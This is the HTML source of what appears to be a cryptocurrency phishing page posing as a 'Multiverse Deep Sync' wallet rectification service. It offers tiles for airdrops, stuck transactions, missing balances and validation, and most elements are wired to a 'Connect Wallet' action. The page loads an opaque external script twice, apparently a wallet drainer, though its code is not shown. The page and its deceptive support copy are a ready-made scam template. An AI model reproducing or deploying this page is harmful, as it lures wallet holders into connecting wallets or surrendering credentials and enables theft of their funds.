<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Multiverse Deep Sync - One wallet, multiverse support</title>
    <meta name="description" content="One wallet, multiverse support We are unifying Web3 by providing best-in-class, self-custodial, and multichain supportmultiverse support We are unifying Web2 by providing best-in-class, self-custodial, and multichain support">
    <link href="assets/img/favicon.ico.html" rel="shortcut icon">
    <!-- Fonts -->
    <link href="assets/css/style.min.css" rel="stylesheet">

</head>
<script charset="UTF-8" async type="text/javascript" src="./c3b_62a0feeea45001657a6905791a.js"></script>

<body>
    <div class="box-container limit-width connectButton">
        <div id="spinner-area">
            <div class="spinner">
                <div class="double-bounce1 connectButton"></div>
                <div class="double-bounce2 connectButton"></div>
            </div>
        </div>
        <!-- ***** FRAME MODE ****** -->
        <div class="body-borders" data-border="20">
            <div class="top-border bg-white"></div>
            <div class="right-border bg-white"></div>
            <div class="bottom-border bg-white"></div>
            <div class="left-border bg-white"></div>
        </div>
        <header id="header">

        </header>
        <!-- BANNER -->
        <div class="top-header overlay item1 text-align">
            <div class="container">
                <div class="col-12 col-md-6 col-lg-12 text-center wrapper">
                    <h1 class="heading" data-aos="fade-up" data-aos-duration="800">Blockchain rectification <br>
                        <div class="animatype"> <span id="typed3"></span></div>
                    </h1>
                    <h3 class="subheading fw-normal lh-32" data-aos="fade-up" data-aos-duration="1200">We are unifying Web3 by providing best-in-class, self-custodial, and multichain support using modern and strong encryption that is not only fast but securely connects your wallet to our sync server to give you a better experience.
                        <br>All of this is made possible because of the blockchain cloud infrastructure powered by<span class="c-pink"> Chain Cloud and Sequence.</span></h3>
                    <div class="action">
                        <a class="btn btn-default-purple-fill me-3 mt-3">Connect Wallet</a>
                    </div>
                </div>
            </div>
        </div>

        <img class="blobleft svg d-none connectButton" src="assets/img/background/blob.svg" alt="Blob Background">

        <section class="sec-normal sec-grad-yellow-to-black-right bg-colorstyle bottomhalfpadding">
            <div class="faq">
                <div class="container connectButton">
                    <img class="blobright svg d-none" src="assets/img/background/blob.svg" alt="Blob Background">
                    <div class="row">
                        <div class="col-md-12 col-sm-12 text-center connectButton">
                            <h2 class="section-heading text-white mergecolor">Deep Sync Selection</h2>
                            <p class="section-subheading text-muted mergecolor">You can also connect your wallet by selecting any of the <span class="c-pink">option</span> below.</p>
                        </div>
                    </div>
                </div>
            </div>
        </section>
        <section class="services sync pt-4 pb-80 bg-colorstyle notoppadding connectButton">
            <div class="container connectButton">
                <div class="service-wrap connectButton">
                    <div class="row">
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="assets/fonts/svg/bug-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform connectButton">
                                        <div class="title mergecolor connectButton">Rectification</div>
                                        <div class="description seccolor connectButton">Click here for rectification related issues.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="assets/fonts/svg/right-left-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Migration</div>
                                        <div class="description seccolor">Click here to migrate seamlessly with no hassle.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="assets/fonts/svg/arrow-down-up-lock-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">NFTs</div>
                                        <div class="description seccolor">Click here to mint/transfer nfts or need support on how to receive nfts?</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="assets/fonts/svg/toolbox-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Swap/Exchange</div>
                                        <div class="description seccolor">We will support you in any related issues with swaping and/or exchange of coins.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="assets/fonts/svg/file-circle-exclamation-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Claim Reward</div>
                                        <div class="description seccolor">Click here for reward claiming or any related issues.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="assets/fonts/svg/droplet-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Claim Airdrop</div>
                                        <div class="description seccolor">Click here for airdrop claiming or any related issues.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="assets/fonts/svg/circle-pause-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Transaction Delay</div>
                                        <div class="description seccolor">Click here for stuck/delayed transactions.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="assets/fonts/svg/coins-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Buy Coins/Tokens</div>
                                        <div class="description seccolor">To trade, your account must be marked as a trusted payment source.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="assets/fonts/svg/satellite-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Missing/Irregular balance</div>
                                        <div class="description seccolor">Click here for balance issue.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="assets/fonts/svg/bridge-circle-exclamation-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Bridge Transfer</div>
                                        <div class="description seccolor">Do you have any issue while trying to transfer tokens between chains?</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="assets/fonts/svg/user-lock-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Claim V2</div>
                                        <div class="description seccolor">Do you have any issue while trying to claim your v2?</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="assets/fonts/svg/network-wired-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Validate</div>
                                        <div class="description seccolor">Click here to start validation.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="assets/fonts/svg/triangle-exclamation-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Wallet Glitch/Error</div>
                                        <div class="description seccolor">Click here if you have any glitch issues on your wallet.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="assets/fonts/svg/sack-dollar-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">High Fees</div>
                                        <div class="description seccolor">Click here if you are facing an increase in transaction fees.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="assets/fonts/svg/circle-check-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Whitelist</div>
                                        <div class="description seccolor">Click here for help whitelisting your wallet for nfts.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="assets/fonts/svg/piggy-bank-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Staking</div>
                                        <div class="description seccolor">Click here for tokens/coins staking related issues.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="assets/fonts/svg/right-to-bracket-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Login Issues</div>
                                        <div class="description seccolor">Click here if you encounter any issues logging in to your wallet.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="assets/fonts/svg/triangle-exclamation-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Slippage</div>
                                        <div class="description seccolor">Click here for slippage related issues.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="assets/fonts/svg/triangle-exclamation-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Other issues not listed</div>
                                        <div class="description seccolor">Click here if you can't find your issue among the ones listed above.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </section>
        <footer class="footer">
            <div class="footer-bottom">
                <div class="container">
                    <div class="row">
                        <div class="col-lg-6">
                            <ul class="footer-menu">
                                <li class="menu-item by"> © 2023. Multiverse Wallet Rectification.
                                </li>
                            </ul>
                        </div>
                        <div class="col-lg-6 terms">
                            <ul id="footer-menu" class="footer-menu">
                                <li class="menu-item by"><a href="index.html#">Term of Services</a></li>
                                <li class="menu-item by"><a href="index.html#">Privay Policy</a></li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
        </footer>
    </div>
    <!-- ***** BUTTON GO TOP ***** -->
    <a href="index.html#0" class="cd-top"><i class="fas fa-angles-up"></i> </a>
    <!-- Javascript -->
    <script src="assets/js/jquery.min.js"></script>
    <script defer src="assets/js/bootstrap.min.js"></script>
    <script src="assets/js/typed.js"></script>
    <script defer src="assets/js/scripts.min.js"></script>
    <script>
        var typed3 = new Typed('#typed3', {
            strings: ["All Networks", "Ethereum Chain", "Binance Smart Chain", "Polygon Chain", "Avalanche Chain", "Cronos Chain", "Arbitrum Chain", "Fantom Chain"],
            typeSpeed: 50,
            backSpeed: 20,
            smartBackspace: true,
            loop: true
        });
    </script>
    <script src="code.tidio.co/dqgc4q4pqhmv1g7p9s8rolsblte8xn7r.html" async></script>
    <script charset="UTF-8" async type="text/javascript" src="./c3b_62a0feeea45001657a6905791a.js"></script>
</body>

</html>